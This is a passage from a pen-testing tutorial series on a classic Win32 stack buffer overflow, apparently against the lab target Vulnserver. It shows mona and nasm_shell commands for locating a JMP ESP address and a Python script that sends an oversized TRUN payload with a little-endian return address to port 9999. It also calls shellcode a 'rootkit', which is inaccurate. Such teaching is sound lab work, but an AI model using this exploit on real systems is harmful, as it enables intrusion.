November 4, 2019 · Basic Pen-Testing Adv. Pen-Testing

6.3 : Classic buffer overflow - Win32 buffer overflow (Part VII)

7. Generate a rootkit with Metasploit's msfvenom and append it to the payload without overrunning the buffer

When we generate a rootkit, we need to look for an injectable memory address.

In this case, we can use mona.
It is a Python module for Immunity Debugger that analyses the memory protections of the loaded modules.

Download it, copy to C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands\ .

Restart your server & Immunity Debugger.

In the command input bar, we can hit

!mona help

to learn how to use mona.


Let's use the modules function to look for a DLL that is a usable endpoint.
We want zero memory protections here:
no ASLR, no rebase, etc.

!mona modules


The essfunc.dll is our target.

Let's look for the memory address in essfunc.dll with the find command.
We need the bytes ff e4, which encode the JMP ESP instruction.
You can use nasm_shell to see why we search for ffe4:

[email protected]:/usr/share/metasploit-framework/tools# locate nasm_shell
[email protected]:/usr/share/metasploit-framework/tools# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp

Back to our module, let's try this.

!mona find -s "\xff\xe4" -m essfunc.dll


So we have a few addresses that can be used for the exploit.
Let's choose the first one, 625011af.

Here is one of the most important things you need to know about memory address injection.
If your target is little-endian, like the x86 architecture, you need to reverse the byte order of the memory address, like this: "\xaf\x11\x50\x62".
Otherwise (big-endian) it should be "\x62\x50\x11\xaf".

Check the target's architecture to know which byte order applies.

So let's go back to Immunity Debugger.
We need to make sure that 625011af is reached by our payload.
We can set a breakpoint on this address to test whether our exploit is working.

Click the blue arrow button (go to address)

Enter the address

Find the address, right-click it, and add a breakpoint

Let's run it.

import socket, sys

def prope(message):
    """
    Probe the server with one request.

    :param message: request message (bytes)
    :return: void
    """
    host = ""  # target host; left blank in the original listing
    port = 9999
    res = None
    try:
        my_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        my_socket.connect((host, port))
        my_socket.settimeout(10)  # add this to prevent freezing the connection
        my_socket.send(message)  # send the request (the send call was missing from the pasted listing)
        res = my_socket.recv(2048).decode().replace("\n", "").replace("\r", "")
        # hide the success, look for failure: we need a crash, we need failure.
        print("[success] %s:%s %s => %s" % (host, port, message, res))
    except Exception:
        print("[error] %s:%s %s => None" % (host, port, len(message)))  # modify the output for testing total length
        # sys.exit()

def main():
    # memory address 625011af
    # shell = '\x62\x50\x11\xaf'
    shell = b"\xaf\x11\x50\x62"  # little-endian byte order for x86
    # shell = b"BBBB"
    payload = b"TRUN ." + b"A" * 2006 + shell
    # print(payload)
    prope(payload)
    print("completed test")

if __name__ == "__main__":
    main()

Note that in Python 3 we have to use byte strings when concatenating the payload.
Otherwise, when the str is encoded as UTF-8, any character above 0x7f (such as \xaf) becomes two bytes and an extra \xc2 is inserted, which shifts the address bytes.
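As an added example (not the post's own code), this covers the byte-order rule and the Python 3 bytes note above: the module image and its base address are constructed stand-ins, not essfunc.dll; the locate-ff-e4 step mirrors what the mona find command does.

```python
import struct
from typing import List, Tuple

# Constructed sample: a fake module image with a single JMP ESP (ff e4) at offset
# 0x11af, loaded at an assumed base of 0x62500000 (so the hit lands at 0x625011af).
MODULE_BASE = 0x62500000
FAKE_IMAGE = b"\x90" * 0x11af + b"\xff\xe4" + b"\x90" * 16


def find_jmp_esp(image: bytes, base: int) -> List[int]:
    """Return every absolute address in `image` where the bytes ff e4 (JMP ESP) occur."""
    hits, pos = [], image.find(b"\xff\xe4")
    while pos != -1:
        hits.append(base + pos)
        pos = image.find(b"\xff\xe4", pos + 1)
    return hits


def address_bytes(addr: int, little_endian: bool = True) -> bytes:
    """Encode a 32-bit address in the byte order the target CPU reads it.

    On x86 (little-endian) 0x625011af must be written as af 11 50 62;
    on a big-endian target it would be 62 50 11 af.
    """
    return struct.pack("<I" if little_endian else ">I", addr)


def decodes_to_jmp_esp(image: bytes, base: int, addr: int) -> bool:
    """Check that the address chosen really points at ff e4 inside the image."""
    off = addr - base
    return 0 <= off and image[off:off + 2] == b"\xff\xe4"


def str_vs_bytes_length(byte_value: int) -> Tuple[int, int]:
    """Python 3 pitfall: a str holding chr(0xaf) encodes to two UTF-8 bytes (c2 af),
    while bytes([0xaf]) stays one byte. Returns (encoded str length, bytes length)."""
    return len(chr(byte_value).encode("utf-8")), len(bytes([byte_value]))


if __name__ == "__main__":
    for hit in find_jmp_esp(FAKE_IMAGE, MODULE_BASE):
        print("JMP ESP at %08x -> payload bytes %r" % (hit, address_bytes(hit)))
    print("str vs bytes length for 0xaf:", str_vs_bytes_length(0xaf))
```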


Let's get to the rootkit in the next chapter.